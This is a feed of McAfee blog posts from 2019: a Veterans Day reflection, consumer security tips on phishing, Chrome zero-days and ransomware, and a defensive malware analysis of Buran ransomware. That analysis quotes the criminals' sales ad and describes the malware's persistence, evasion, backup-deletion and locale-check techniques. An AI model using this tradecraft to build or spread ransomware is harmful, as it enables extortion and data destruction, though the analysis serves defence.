Veterans Day U.S. – A McAfee MoM’s Reflection https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/veterans-day-u-s-a-mcafee-moms-reflection/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/veterans-day-u-s-a-mcafee-moms-reflection/#respond Thu, 07 Nov 2019 15:33:59 +0000 https://securingtomorrow.mcafee.com/?p=97332

By: Deb, Executive Assistant, Plano TX On Monday, November 11, the U.S. celebrates Veterans Day. We at McAfee U.S. are able to spend this holiday paying tribute to coworkers, friends and family members who have served our country in the various branches of military service. Being able to honor, celebrate and remember our nation’s heroes […]

The post Veterans Day U.S. – A McAfee MoM’s Reflection appeared first on McAfee Blogs.

]]>

By: Deb, Executive Assistant, Plano TX

On Monday, November 11, the U.S. celebrates Veterans Day. We at McAfee U.S. are able to spend this holiday paying tribute to coworkers, friends and family members who have served our country in the various branches of military service. Being able to honor, celebrate and remember our nation’s heroes on Veterans Day every year is one of the things that I hold near and dear to my heart.

Wearing RED for a Reason

Anyone who knows me or sees me on Fridays at our Plano headquarters location, knows that I wear red EVERY Friday. I wear RED as a reminder to “Remember Everyone Deployed.”  I’ve recently noticed that many of my peers have also begun to wear red on Fridays. Regardless of whether it’s McAfee red or acknowledging our veterans with RED, I make it a point to acknowledge and thank them for showing their support!  We have such a great team at McAfee-Plano, and I always encourage my colleagues to wear RED. It’s an easy, yet powerful, way to make a statement of support for our veterans!

I am passionate about our military and veterans because I come from a long line of military servants. My dad and brother-in-law both served in the U.S. Air Force. Three of my grandfathers served in the military—two in the U.S. Army and one in the U.S. Army Air Corps. I also have an uncle/Godfather who served as a Navy Seabee. But my most powerful connection to the military is as a MoM (Mother of a Marine). My 19-year-old son, Austin, is a Lance Corporal in the U.S. Marine Corps. I call Austin my tough, awesome, and brave hero. He not only has my back, but he has the backs of all Americans. As his family, we are fortunate that he is currently stationed stateside. Of course, that can change in the blink of an eye.

Making the Sacrifice

Very recently, it has sunk in that my family is living our lives based on someone else’s calendar and the decisions of the U.S. Marine Corps. They have full control over Austin’s schedule and our ability to see him. As easy as a flight can be booked and other plans finalized, a leave can be taken away. In fact, my son’s leave for Thanksgiving this year was recently cancelled. This would have been his first time home since his graduation from boot camp at the end of June 2018. Yes, as a mama, I cried for an entire day when I heard that he would not be able to come home. But then I remembered that his calling is so much bigger than that of a son, a brother, a nephew, or grandson coming home for the holiday. When I remembered that his obligation and commitment is so much greater, my tears had to stop. My pride in him swelled, as did my love for my country. He and his military brothers and sisters, in all branches of service, are out there protecting us and fighting for our freedom. I cannot be selfish with my wishes for him to be home. What I can do is pray for his safety, and the safety of all those serving. And I will continue to be thankful for the sacrifices of all military personnel, past and present, and their families.

Feeling Support at McAfee

One of the reasons I love working here at McAfee is the knowledge that our company is so supportive of those who are actively serving in the military as well as our honored veterans and their family members. As a MoM, it makes me proud when I come to work each Friday and see more and more of my coworkers dressed in red; or I get the opportunity to participate in Veterans events and celebrations. I am grateful for my colleagues’ gestures of support that bring a big smile to my face. McAfee’s strong commitment to Veterans through our Veterans Community and active recruiting of veterans are other reasons I am proud to be a McAfee team member.

 

The post Veterans Day U.S. – A McAfee MoM’s Reflection appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/veterans-day-u-s-a-mcafee-moms-reflection/feed/ 0
Buran Ransomware; the Evolution of VegaLocker https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/#respond Tue, 05 Nov 2019 17:37:32 +0000 https://securingtomorrow.mcafee.com/?p=97285

McAfee’s Advanced Threat Research Team observed how a new ransomware family named ‘Buran’ appeared in May 2019. Buran works as a RaaS model like other ransomware families such as REVil, GandCrab (now defunct), Phobos, etc. The author(s) take 25% of the income earned by affiliates, instead of the 30% – 40%, numbers from notorious malware […]

The post Buran Ransomware; the Evolution of VegaLocker appeared first on McAfee Blogs.

]]>

McAfee’s Advanced Threat Research Team observed how a new ransomware family named ‘Buran’ appeared in May 2019. Buran works as a RaaS model like other ransomware families such as REVil, GandCrab (now defunct), Phobos, etc. The author(s) take 25% of the income earned by affiliates, instead of the 30% – 40%, numbers from notorious malware families like GandCrab, and they are willing to negotiate that rate with anyone who can guarantee an impressive level of infection with Buran. They announced in their ads that all the affiliates will have a personal arrangement with them.

For this analysis we present, we will focus on one of the Buran hashes:

We will highlight the most important observations when researching the malware and will share protection rules for the endpoint, IOCs and a YARA rule to detect this malware.

Buran Ransomware Advertisement

This ransomware was announced in a well-known Russian forum with the following message:

 

Buran is a stable offline cryptoclocker, with flexible functionality and support 24/7.

Functional:

Reliable cryptographic algorithm using global and session keys + random file keys;
Scan all local drives and all available network paths;
High speed: a separate stream works for each disk and network path;
Skipping Windows system directories and browser directories;
Decryptor generation based on an encrypted file;
Correct work on all OSs from Windows XP, Server 2003 to the latest;
The locker has no dependencies, does not use third-party libraries, only mathematics and vinapi;

The completion of some processes to free open files (optional, negotiated);
The ability to encrypt files without changing extensions (optional);
Removing recovery points + cleaning logs on a dedicated server (optional);
Standard options: tapping, startup, self-deletion (optional);
Installed protection against launch in the CIS segment.

Conditions:

They are negotiated individually for each advert depending on volumes and material.

Start earning with us!

 

The announcement says that Buran is compatible with all versions of the Windows OS’s (but during our analysis we found how, in old systems like Windows XP, the analyzed version did not work) and Windows Server and, also, that they will not infect any region inside the CIS segment. Note: The CIS segment belongs to ten former Soviet Republics: Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Ukraine, and Uzbekistan.

Rig Exploit Kit as an Entry Vector

Based upon the investigation we performed, as well as research by “nao_sec” highlighted in June 2019, we discovered how Buran ransomware was delivered through the Rig Exploit Kit. It is important to note how the Rig Exploit Kit is the preferred EK used to deliver the latest ransomware campaigns.

FIGURE 1. EXPLOIT KIT

The Rig Exploit Kit was using CVE-2018-8174 (Microsoft Internet Explorer VBScript Engine, Arbitrary Code Execution) to exploit in the client-side. After successful exploitation this vulnerability will deliver Buran ransomware in the system.

Static Analysis

The main packer and the malware were written in Delphi to make analysis of the sample more complicated. The malware sample is a 32-bit binary.

FIGURE 2. BURAN STATIC INFORMATION

In our analysis we detected two different versions of Buran, the second with improvements compared to the first one released.

FIGURE 3. BURAN STATIC INFORMATION

The goal of the packer is to decrypt the malware making a RunPE technique to run it from memory. To obtain a cleaner version of the sample we proceed to dump the malware from the memory, obtaining an unpacked version.

Country Protection

Checking locales has become quite popular in RaaS ransomware as authors want to ensure they do not encrypt data in certain countries. Normally we would expect to see more former CIS countries but, in this case, only three are verified.

FIGURE 4. GETTING THE COUNTRY OF THE VICTIM SYSTEM

This function gets the system country and compares it with 3 possible results:

  • 0x7 -> RUSSIAN FEDERATION
  • 0x177 -> BELARUS
  • 0x17C -> UKRAINE

It is important to note here that the advertising of the malware in the forums said it does not affect CIS countries but, with there being 10 nations in the region, that is obviously not entirely accurate.

If the system is determined to be in the Russian Federation, Belarus or Ukraine the malware will finish with an “ExitProcess”.

The next action is to calculate a hash based on its own path and name in the machine. With the hash value of 32-bits it will make a concat with the extension “.buran”. Immediately after, it will create this file in the temp folder of the victim machine. Importantly, if the malware cannot create or write the file in the TEMP folder it will finish the execution; the check will be done extracting the date of the file.

FIGURE 5. BURAN CHECKS IN THE TEMP FOLDER

If the file exists after the check performed by the malware, the temporary file will be erased through the API “DeleteFileW”.

FIGURE 6. CHECK WHETHER A TEMP FILE CAN BE CREATED

This function can be used as a kill switch to avoid infection by Buran.

Buran ransomware could accept special arguments in execution. If it is executed without any special argument, it will create a copy of Buran with the name “ctfmon.exe” in the Microsoft APPDATA folder and will launch it using ShellExecute, with the verb as “runas”. This verb is not in the official Microsoft SDK but, if we follow the MSDN documentation to learn how it works, we can deduce that the program will ignore its own manifest and prompt the UAC to the user if the protection is enabled.

This behavior could change depending on the compilation options chosen by the authors and delivered to the affiliates.

According to the documentation, the function “CreateProcess” checks the manifest, however in Buran, this is avoided due to that function:

FIGURE 7. LAUNCH OF THE NEW INSTANCE OF ITSELF

Buran in execution will create a registry key in the Run subkey section pointing to the new instance of the ransomware with a suffix of ‘*’. The meaning of this value is that Buran will run in safe mode too:

FIGURE 8. PERSISTENCE IN THE RUN SUBKEY IN THE REGISTRY

The writing operation in the registry is done using the “reg” utility, using a one-liner and concatenating different options with the “&” symbol. This method through “reg.exe” avoids a breakpoint in the main binary.

FIGURE 9. WRITE OF PERSISTENCE IN THE REGISTRY

Buran implements this technique with the objective of making analysis of the sample complicated for malware analysts looking at reverse engineering profiles. After these operations, the old instance of the ransomware will die using “Exit Process”.

Analysis of the Delphi code show that the 2nd version of Buran will identify the victim using random values.

FIGURE 10. GENERATE RANDOM VALUES

After that it will decrypt a registry subkey called “Software\Buran\Knock” in the HKEY_CURRENT_USER hive. For the mentioned key it will check the actual data of it and, if the key does not exist, it will add the value 0x29A (666) to it. Interestingly, we discovered that GandCrab used the same value to generate the ransom id of the victim. If the value and subkey exists the malware will continue in the normal flow; if not, it will decrypt a URL ,“iplogger.ru”, and make a connection to this domain using a special user agent:

FIGURE 11. SPECIAL USER AGENT BURAN

As mentioned, the referrer will be the victim identifier infected with Buran.

The result of this operation is the writing of the subkey previously checked with the value 0x29A, to avoid repeating the same operation.

After this action the malware will enumerate all network shares with the functions :

  • WNetOpenEnumA,
  • WNetEnumResourceA
  • WNetCloseEnum

This call is made in a recursive way, to get and save all discovered shared networks in a list. This process is necessary if Buran wants to encrypt all the network shares as an addition to the logical drives. Buran will avoid enumerating optical drives and other non-mounted volumes. The result of those operations will be saved for Buran to use later in the encryption process.

The ransom note is crypted inside the binary and will be dumped in execution to the victim’s machine. Inside this ransom note, the user will find their victim identifier extracted with the random Delphi function mentioned earlier. This identification is necessary to track their infected users to affiliates to deliver the decryptor after the payment is made.

In the analysis of Buran, we found how this ransomware blacklists certain files and folders. This is usually a mechanism to ensure that the ransomware does not break its functionality or performance.

Blacklisted folders in Buran:

Blacklisted files in Buran:

The encryption process will start with special folders in the system like the Desktop folder. Buran can use threads to encrypt files and during the process will encrypt the drive letters and folders grabbed before in the recognition process.

The ransom note will be written to disk with the name “!!! YOUR FILES ARE ENCRYPTED !!!” with the following content:

FIGURE 12. AN EXAMPLE RANSOM NOTE

Each file crypted is renamed to the same name as before but with the new extension of the random values too.

For example: “rsa.bin.4C516831-800A-6ED2-260F-2EAEDC4A8C45”.

All the files encrypted by Buran will contain a specific filemarker:

FIGURE 13. CRYPTED FILE

In terms of encryption performance, we found Buran slower compared to other RaaS families. According to the authors’ advertisement in the underground forums, they are continually improving their piece of ransomware.

Buran Version 1 vs Buran Version 2

In our research we identified two different versions of Buran. The main differences between them are:

Shadow copies delete process:

In the 2nd version of Buran one of the main things added is the deletion of the shadow copies using WMI.

Backup catalog deletion:

Another feature added in the new version is the backup catalog deletion. It is possible to use the Catalog Recovery Wizard to recover a local backup catalog.

System state backup deletion:

In the same line of system destruction, we observed how Buran deletes in execution the system state backup in the system:

Ping used as a sleep method:

As a poor anti-evasion technique, Buran will use ping through a ‘for loop’ in order to ensure the file deletion system.

The ransom note changed between versions:

VegaLocker, Jumper and Now Buran Ransomware

Despite the file marker used, based on the behavior, TTPs and artifacts in the system we could identify that Buran is an evolution of the Jumper ransomware. VegaLocker is the origin for this malware family.

Malware authors evolve their malware code to improve it and make it more professional. Trying to be stealthy to confuse security researchers and AV companies could be one reason for changing its name between revisions.

This is the timeline of this malware family:

Similarities in Behavior:

Files stored in the temp folder:

VegaLocker:

Jumper:

Buran:

Registry changes:

VegaLocker:

Buran:

Extension overlapping:

In one of the variants (Jumper) it is possible to spot some samples using both extensions:

  • .vega
  • .jamper

Shadow copies, backup catalog and systembackup:

In the analyzed samples we saw how VegaLocker used the same methods to delete the shadow copies, backup catalog and the systembackup.

Coverage

  • RDN/Ransom
  • Ransomware-GOS!E60E767E33AC
  • Ransom
  • RDN/Ransom
  • RDN/Generic.cf
  • Ransom-Buran!

Expert Rule:

Indicators of Compromise

MITRE

The sample uses the following MITRE ATT&CK™ techniques:

  • Disabling Security Tools
  • Email Collection
  • File and Directory Discovery
  • File Deletion
  • Hooking
  • Kernel Modules and Extensions
  • Masquerading
  • Modify Registry
  • Network Service Scanning
  • Peripheral Device Discovery
  • Process Injection
  • Query Registry
  • Registry Run Keys / Start Folder
  • Remote Desktop Protocol
  • Remote System Discovery
  • Service Execution
  • System Time Discovery
  • Windows Management Instrumentation

YARA Rule

We created a YARA rule to detect Buran ransomware samples and the rule is available in our GitHub repository

Conclusion

Buran represents an evolution of a well-known player in the ransomware landscape. VegaLocker had a history of infections in companies and end-users and the malware developers behind it are still working on new features, as well as new brands, as they continue to generate profits from those actions. We observed new versions of Buran with just a few months between them in terms of development, so we expect more variants from the authors in the future and, perhaps, more brand name changes if the security industry puts too much focus on them. We are observing an increase in ransomware families in 2019, as well as old players in the market releasing new versions based on their own creations.

For the binaries, all of them appeared with a custom packer and already came with interesting features to avoid detection or to ensure the user must pay due to the difficulty of retrieving the files. It mimics some features from the big players and we expect the inclusion of more features in future developments.

Buran is slower than other ransomware families we observed, and samples are coded in Delphi which makes reverse engineering difficult.

The post Buran Ransomware; the Evolution of VegaLocker appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/feed/ 0
Are Some Phone Charging Cables Dangerous to Plug in? https://www.mcafee.com/blogs/consumer/hackable/are-some-phone-charging-cables-dangerous-to-plug-in/ https://www.mcafee.com/blogs/consumer/hackable/are-some-phone-charging-cables-dangerous-to-plug-in/#comments Tue, 05 Nov 2019 17:20:39 +0000 https://securingtomorrow.mcafee.com/?p=97322

We’ve all felt helpless as our phone’s battery dwindles in a moment of dire need. 25%…15%… 5%. The panic sets in, and suddenly, any port in the proverbial storm will do. You start outlet hunting and maybe even ask strangers if you can borrow their cable. But have you ever wondered whether every charging station […]

The post Are Some Phone Charging Cables Dangerous to Plug in? appeared first on McAfee Blogs.

]]>

We’ve all felt helpless as our phone’s battery dwindles in a moment of dire need. 25%…15%… 5%. The panic sets in, and suddenly, any port in the proverbial storm will do. You start outlet hunting and maybe even ask strangers if you can borrow their cable. But have you ever wondered whether every charging station and cable is safe?

On the latest episode of “Hackable?” we wanted to find out just dangerous it is to charge your phone with a hacker-modified cable. White-hat Craig Young ships our producer Pedro a secretly-sinister cable and together they launch an attack on host Geoff’s phone and computer. Listen and learn just how much low battery anxiety could put you at risk if you end up charging with the wrong cable!

 

The post Are Some Phone Charging Cables Dangerous to Plug in? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/hackable/are-some-phone-charging-cables-dangerous-to-plug-in/feed/ 1
Helping Kids Think Critically About Influencers They Follow Online https://www.mcafee.com/blogs/consumer/family-safety/helping-kids-think-critically-about-influencers-they-follow-online/ https://www.mcafee.com/blogs/consumer/family-safety/helping-kids-think-critically-about-influencers-they-follow-online/#respond Sun, 03 Nov 2019 15:29:09 +0000 https://securingtomorrow.mcafee.com/?p=97262

When I was a teenager, my role model was Olympic gymnast Mary Lou Retton. I admired everything about her. I cut my hair like hers and brushed my teeth three times a day, determined to get my smile to sparkle like hers. I even started eating Wheaties when she endorsed them, thinking it would help […]

The post Helping Kids Think Critically About Influencers They Follow Online appeared first on McAfee Blogs.

]]>

When I was a teenager, my role model was Olympic gymnast Mary Lou Retton. I admired everything about her. I cut my hair like hers and brushed my teeth three times a day, determined to get my smile to sparkle like hers. I even started eating Wheaties when she endorsed them, thinking it would help me land my back handspring (spoiler alert: it didn’t).

It’s natural and healthy to seek out role models. Who doesn’t want to excel at a skill or possess admirable qualities? Teens today are no different. They look to others to figure out how to attain their goals. But while kids today may have the same emotional desire for role models, the online culture has confused the meaning of influence.

Algorithm vs. Character

We no longer bestow titles like role model and influencer on the few, but the many. And the requirements? Not too steep. Today, influencers win the public’s affections based on the number of likes, follows, shares, or sponsors a person accumulates. When it comes to emulating others, kids turn to famous Instagrammers and YouTubers whose fame is determined by algorithm strength rather than character strength.

For parents, this force field of influence can feel impossible to penetrate. Many (this mom included) constantly feel torn. As our kids mature, we want to give them space to explore and form opinions and preferences of their own apart from our commentary. On the flip side, technology brings more risk to the choices kids make today. Those risks can be severe and include online scams connected to celebrities, data breaches, and mental health issues linked to social influence.

Equipping vs. Condemning

So, what practical steps can we take to help our kids think more critically about the role models, celebrities, or influencers they choose to follow and even emulate? One way to move the needle is to thoughtfully and consistently increase the dialogue about values, beliefs, and goals.

Keeping the conversation focused can be tricky. The goal of guiding your child should aim to equip, not condemn. Hint: The goal isn’t to debate the questionable things a celebrity or influencer chooses to say or do. The goal is to explore and build the values that inform the things your child chooses to say and do.

Here are a few conversation starters to challenge your child to look a little more closely at the influencers and celebrities he or she esteems.

Family Talking Points

Highlight common ground. I instantly connected with Mary Lou Retton because we about the same age and were both half-pints. She was 4’9,” and at that time, I was barely an inch taller and struggling with that. But Mary Lou was fierce, unstoppable, and had a positive attitude that was contagious. Suddenly, short was cool. In talking to your child about the people they admire, point to the common ground, he or she might share with that person. Questions: What kind of character or personal traits do you think you might share with this person? How do you think the two of you are similar or different? If you could have lunch with this person, what do you think you could teach them? What could they teach you?

Find the friction. Encourage your child to look beyond the social surface and find influencers who have overcome real-life struggles. The discussion might turn to issues such as depression, grief, addiction, bullying, or dealing with a disability. Questions: What influencers or celebrities do you admire who have conquered a difficult situation? What have you learned from watching how he or she responded to that situation? How do you think you might respond if you were in that situation?

Learn the back story. If your child admires a person and you can’t figure out the reason, challenge her thinking. If the reasoning is that someone is “so pretty” or “goes to Coachella,” challenge your child to dig deeper and learn as much as she can about her favorite person. Questions: What specific qualities or achievements do you think make this person famous? Do you agree with that? Did you discover events in this person’s life that may have shaped who they are? What did you learn about this person that makes you admire them more? What did you learn that makes you admire them less? How does this person help others? If you were in this person’s shoes, how would you use your influence differently?

Get personal. Sometimes we can strengthen a perspective by looking close to home. Challenge your child to think about the people in his or her family or community. Who do you know that stands up for what’s right? Who makes time to help others? Point out someone who has conquered an addiction or made a courageous comeback of some kind. Questions: What do you think are the three most important traits a person can have? Who do you know who has these traits? If you overheard people talking about you in the future, what words would you hope they would use to describe you?

Asking great questions can improve the quality of family conversations. While technology has changed our vocabulary in dramatic ways, the meaning we apply to our words can survive any cultural shift if we’re intentional. Take the time this week to ask your kids great questions. And stick with it, parents — you have more influence than you think.

The post Helping Kids Think Critically About Influencers They Follow Online appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/helping-kids-think-critically-about-influencers-they-follow-online/feed/ 0
What You Need to Know About the Google Chrome Vulnerabilities https://www.mcafee.com/blogs/consumer/consumer-threat-notices/google-chrome-vulnerabilities/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/google-chrome-vulnerabilities/#respond Fri, 01 Nov 2019 23:05:03 +0000 https://securingtomorrow.mcafee.com/?p=97259

While you might have been preoccupied with ghosts and goblins on Halloween night, a different kind of spook began haunting Google Chrome browsers. On October 31st, Google Chrome engineers issued an urgent announcement for the browser across platforms due to two zero-day security vulnerabilities, one of which is being actively exploited in the wild (CVE-2019-13720). […]

The post What You Need to Know About the Google Chrome Vulnerabilities appeared first on McAfee Blogs.

]]>

While you might have been preoccupied with ghosts and goblins on Halloween night, a different kind of spook began haunting Google Chrome browsers. On October 31st, Google Chrome engineers issued an urgent announcement for the browser across platforms due to two zero-day security vulnerabilities, one of which is being actively exploited in the wild (CVE-2019-13720).

So, what is the Google Chrome zero-day exploit? While there are few specific details known at this time, researchers did uncover that the bug is a use-after-free flaw, which is a memory corruption flaw that attempts to access a device’s memory after it has been freed. If this occurs, it can cause a variety of issues including program crashes, execution of malicious code, or even allowing an attacker to gain full remote access to the device.

The second of the two vulnerabilities (CVE-2019-13721) affects PDFium, a platform developed by Foxit and Google. PDFium provides developers with capabilities to leverage an open-source software library for viewing and searching for PDF documents. Like the first bug, this flaw is also a use-after-free vulnerability. However, there have been no reports of it being exploited by cybercriminals for malicious purposes yet.

Luckily, Google has quickly acknowledged the vulnerabilities and is rolling out a patch for these bugs over the coming days. Meanwhile, follow these security tips to help safeguard your data and devices:

  • Update, update, update. Be sure to install the latest Chrome browser update immediately to help mitigate any risk of falling victim to these exploits.
  • Turn on automatic updates. Practice good security hygiene by turning on automatic updates. Cybercriminals rely on unpatched software to exploit vulnerabilities, so ensure that your device software is updated as soon as patches are available.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

 

The post What You Need to Know About the Google Chrome Vulnerabilities appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/google-chrome-vulnerabilities/feed/ 0
ST12: IoT in Energy & Manufacturing https://www.mcafee.com/blogs/other-blogs/podcast/st12-iot-in-energy-manufacturing/ https://www.mcafee.com/blogs/other-blogs/podcast/st12-iot-in-energy-manufacturing/#comments Fri, 01 Nov 2019 14:00:34 +0000 https://securingtomorrow.mcafee.com/?p=97253

In this episode, security operations solutions strategists Andrew Lancashire and Kate Scarcella discuss the world of Internet of Things inside the Energy and Manufacturing industries.

The post ST12: IoT in Energy & Manufacturing appeared first on McAfee Blogs.

]]>

In this episode, security operations solutions strategists Andrew Lancashire and Kate Scarcella discuss the world of Internet of Things inside the Energy and Manufacturing industries.

The post ST12: IoT in Energy & Manufacturing appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/podcast/st12-iot-in-energy-manufacturing/feed/ 1
Ransomware: The Digital Plague that Still Persists https://www.mcafee.com/blogs/enterprise/ransomware-the-digital-plague-that-still-persists/ https://www.mcafee.com/blogs/enterprise/ransomware-the-digital-plague-that-still-persists/#respond Thu, 31 Oct 2019 14:30:27 +0000 https://securingtomorrow.mcafee.com/?p=97251

Ransomware began its reign of cyber terror in 1989 and remains a serious and dangerous threat today. In layman’s terms, ransomware is malware that employs encryption to lock users out of their devices or block access to critical data or files. A sum of money, or ransom, is then demanded in return for access to […]

The post Ransomware: The Digital Plague that Still Persists appeared first on McAfee Blogs.

]]>

Ransomware began its reign of cyber terror in 1989 and remains a serious and dangerous threat today. In layman’s terms, ransomware is malware that employs encryption to lock users out of their devices or block access to critical data or files. A sum of money, or ransom, is then demanded in return for access to the information. Some effects of ransomware include downtime, data loss, possible intellectual property theft, major financial consequences and more.

The Rise of Ransomware

 Ransomware and their variants are rapidly evolving. McAfee Labs found that ransomware grew by 118% in the first quarter of 2019, and discovered new ransomware families using innovative techniques to target and infect enterprises. Based on volume, the top three ransomware families that were most active in Q1 were Dharma, GandCrab and Ryuk.

Many variations of ransomware exist. Often we’ve seen ransomware and other malware being distributed using email spam campaigns or through targeted attacks. But in Q1, our researchers found an increasing number of attacks are gaining access to companies that have open and exposed remote access points, such as RDP and virtual network computing (VNC). RDP credentials can be brute-forced, obtained from password leaks, or simply bought in underground markets. To note, the ransomware Dharma used the RDP attack method, while GandCrab and Ryuk used mostly spear-phishing as a distribution mechanism.

The Impact of Ransomware

Earlier this year, cybercriminals targeted the city of Riviera Beach, Fla., a waterfront suburb north of Palm Beach. After major disruptions in municipal services resulting from the ransomware, city leaders complied with the hacker gang’s demand of 65 bitcoin (roughly $600,000) in exchange for the decryption key. Although not suggested, we’ve seen a number of victims give in to the extortion demands of attackers, often paying the ransom demand of hundreds or thousands of dollars in order to restore their systems. In the end, you may reduce downtime by paying the ransom, but it’s never a guarantee that you will receive a decryption key, plus you will be funding criminal activity.

The impact of ransomware is more than merely a nuisance. Companies tend to experience temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files, and potential harm to an organization’s reputation.

How to Defend Against Ransomware

We must not forget that with every cyberattack, there is always a human cost, whether it’s a business dealing with an outage or a consumer dealing with a major fraud. It’s important to develop a proactive disaster recovery plan to increase your chances of withstanding ransomware. To help steer clear of ransomware, below are a few tips to follow:

  • Defend – Sufficiently robust security solutions can protect you from known threats as well as those that have not yet been formally detected. Always downloading the newest version of your operating system or apps helps you stay ahead of threats
  • Back up your data – Frequently back up essential data, ideally storing it both locally and on the cloud.
  • Stay informed – Resources such as nomoreransom.org—an initiative created by the National High Tech Crime Unit of Netherlands, Europol’s European Cybercrime Centre, and McAfee—aim to provide prevention education and help ransomware victims retrieve their encrypted data without having to pay criminals.

The post Ransomware: The Digital Plague that Still Persists appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/ransomware-the-digital-plague-that-still-persists/feed/ 0
Chapter Preview: Ages 11 to 17 – From Tweens to Teens https://www.mcafee.com/blogs/consumer/consumer-threat-notices/from-tweens-to-teens/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/from-tweens-to-teens/#respond Thu, 31 Oct 2019 10:00:43 +0000 https://securingtomorrow.mcafee.com/?p=96534

For anyone who asks what happens during the tween through teen years, the best answer is probably, “What doesn’t happen?!” Just so you know, I’ve been there, done that, and got the T-shirt. And I survived. My kids were the first generation to grow up on social media. Like most teens in the mid-2000s, they […]

The post Chapter Preview: Ages 11 to 17 – From Tweens to Teens appeared first on McAfee Blogs.

]]>

For anyone who asks what happens during the tween through teen years, the best answer is probably, “What doesn’t happen?!”

Just so you know, I’ve been there, done that, and got the T-shirt. And I survived. My kids were the first generation to grow up on social media. Like most teens in the mid-2000s, they got their first taste with MySpace and then switched to Facebook as the masses shifted there around 2009. They also got into other platforms, like Instagram, and stuck with them while others came and went. And yes, sharing almost every facet of their lives presented many challenges. I won’t get into details here as it might embarrass my kids, but suffice it to say that mistakes were made.

Being a security and privacy practitioner, I made sure there were lots of discussions on how to use these platforms safely. The early discussions centered on privacy and the permanence of data, but eventually led to security talks as the platforms were inundated with scams and other malicious activities. As you can imagine, when my kids were tweens and teens, the internet was a different place than it is today, and I’m sure it will be very different 10 to 15 years from now.

 

This chapter of “Is Your Digital Front Door Unlocked?” steps you through what your tween and teen face as they spend an increasing amount of time online and using connected things. It expands upon some of the topics discussed earlier in the book with more of an eye towards how those topics impact this age group, while offering advice and insights on topics that often surface at this age. We tackle some big topics too, such when to get your child a smartphone, how many children will make friends that they will only know online, cyberstalking, and the secret digital life of teens that every parent should know. This chapter packs a big punch—as it should, because these are some big years for parents and kids alike.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

The post Chapter Preview: Ages 11 to 17 – From Tweens to Teens appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/from-tweens-to-teens/feed/ 0
3 Tips to Protect Yourself From the Office 365 Phishing Scams https://www.mcafee.com/blogs/consumer/consumer-threat-notices/office-365-phishing/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/office-365-phishing/#respond Thu, 31 Oct 2019 04:01:15 +0000 https://securingtomorrow.mcafee.com/?p=97244

Cybercriminals seem to get more and more sophisticated with their attacks, and phishing scams are no different. The McAfee Labs team has observed a new phishing campaign using a fake voicemail message to trick victims into giving up their Office 365 email credentials. During the investigation, the team has found three different phishing kits being […]

The post 3 Tips to Protect Yourself From the Office 365 Phishing Scams appeared first on McAfee Blogs.

]]>

Cybercriminals seem to get more and more sophisticated with their attacks, and phishing scams are no different. The McAfee Labs team has observed a new phishing campaign using a fake voicemail message to trick victims into giving up their Office 365 email credentials. During the investigation, the team has found three different phishing kits being used to exploit targets.

How exactly does this sneaky phishing scam work? It all begins when a victim receives an email stating that they’ve missed a phone call, along with a request to log into their account to access the voice message. The email also contains an attached HTML file that redirects the victim to a phishing website. This website prepopulates the victim’s email address and asks them to enter their Office 365 credentials. What’s more, the stealthy attachment contains an audio recording of someone talking, leading the victim to believe that they are listening to a legitimate voicemail.

Once the victim enters their password, they are presented with a page stating that their login was successful. The victim is then redirected to the office.com login page, leading them to believe that everything is perfectly normal. Little do they know that their credentials have just been harvested by a cybercriminal.

While this sneaky scheme has been primarily used to target organizations, there is much to be taken away from this incident, as cybercriminals often disguise themselves as businesses to phish for user data. To protect yourself from these stealthy scams, check out the following tips:

  • Go directly to the source. Be skeptical of emails claiming to be from companies with peculiar asks or messages. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Be cautious of emails asking you to take action. If you receive an email asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links.
  • Hover over links to see and verify the URL. If someone sends you an email with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips to Protect Yourself From the Office 365 Phishing Scams appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/office-365-phishing/feed/ 0
Office 365 Users Targeted by Voicemail Scam Pages https://www.mcafee.com/blogs/other-blogs/mcafee-labs/office-365-users-targeted-by-voicemail-scam-pages/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/office-365-users-targeted-by-voicemail-scam-pages/#respond Thu, 31 Oct 2019 04:01:09 +0000 https://securingtomorrow.mcafee.com/?p=97170

Over the past few weeks McAfee Labs has been observing a new phishing campaign using a fake voicemail message to lure victims into entering their Office 365 email credentials. At first, we believed that only one phishing kit was being used to harvest the user’s credentials. However, during our investigation, we found three different malicious […]

The post Office 365 Users Targeted by Voicemail Scam Pages appeared first on McAfee Blogs.

]]>

